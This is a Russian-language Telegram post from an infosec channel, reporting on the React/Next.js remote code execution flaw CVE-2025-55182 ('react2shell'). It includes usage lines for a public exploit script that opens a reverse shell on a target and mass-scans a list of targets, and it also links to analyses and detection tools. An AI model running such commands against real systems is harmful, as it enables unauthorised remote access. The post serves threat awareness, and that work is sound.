C
Cult Of Wire
@cultofwire934 подп.
603просмотров
64.6%от подписчиков
5 декабря 2025 г.
statsScore: 663
Небольшое продолжение по CVE-2025-55182 CVE-2025-55182 теперь react2shell, а так же появился стабильный эксплоит. Получить шелл можно в одну команду: # Предварительно не забываем поднять листенер, скрипт его не поднимает. python3 exp.py http://127.0.0.1:3000 --revshell 127.0.0.1 1234 # Или сразу прогнать список python3 exp.py -f targets.txt --check Подоспел и плагин для Burp: Next.js RSC RCE Scanner. По данным FOFA в интернете торчит 8.7 миллионов потенциально уязвимых хостов (в Shodan результаты скромнее, но тоже неплохо), а Amazon уже сообщает, что китайские хакеры уже вовсю эксплуатируют уязвимость. Разбор самой уязвимости можно почитать в блоге SeachLight Cyber и в PoC-разборе от maple3142. А у Project Disovery появился обновлённый шаблон для Nuclei. —- - Gihub Gist: POC for CVE-2025-55182 that works on Next.js 16.0.6 - SeachLight Cyber High Fidelity Detection Mechanism for RSC/Next.js RCE (CVE-2025-55182 & CVE-2025-66478) - AWS Security Blog: China-nexus cyber threat groups rapidly exploit React2Shell vulnerability (CVE-2025-55182)
603
просмотров
1060
символов
Нет
эмодзи
Нет
медиа

Другие посты @cultofwire

Все посты канала →
Небольшое продолжение по CVE-2025-55182 CVE-2025-55182 тепер — @cultofwire | PostSniper